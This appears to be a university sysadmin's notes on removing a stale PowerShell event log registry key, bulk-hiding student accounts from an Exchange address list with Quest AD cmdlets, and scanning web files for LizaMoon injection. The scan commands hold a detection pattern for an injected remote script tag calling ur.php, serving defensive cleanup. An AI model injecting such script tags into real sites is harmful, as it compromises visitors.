PowerShell Logs

Some time ago the Windows PowerShell event log replaced the PowerShell event log in server 2003. Initially this meant there both categories appeared in the event viewer and the PowerShell event log would fill up with errors. The solution is to remove the registry key –

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\PowerShell

Unfortunately the application of some windows updates results in the re-creation of the PowerShell key so you need to check this occasionally and remove when appropriate.

Rendering Student Entries Invisible in the GAL

You would think that the AD entry Exchange attribute msExchHideFromAddressLists should hide an entry from the GAL if set to TRUE. However, if there are entries for the non-Exchange attribute ShowInAddressBook that will override the other setting. You need to use the Quest AD utilities to seek out and update the rogue entries where this is the case. The command string below did the job –

Get-QADUser -sizelimit 0 -searchroot ‘ads.qub.ac.uk/QUB/Student’ -Includedproperties showinaddressbook |where-object {$_.showinaddressbook -ne $null} |Set-QADUser -ObjectAttributes @{msExchHideFromAddressLists=”TRUE”;ShowInAddressBook=””}

Grepping for LizaMoon infected website files

The Liza Moon attack targets Microsoft SQL Server installations injecting javascript tags into website files. Although we are primarily using Unix/Linux servers I performed some scans using the following to check for lizamoon infection:

find . -type f -exec egrep “\<script src=http\:\/\/.*\/ur\.php” {} \;

On Windows Server I used Powershell and the following command:

Get-ChildItem * -Recurse | Select-String -Pattern ur.php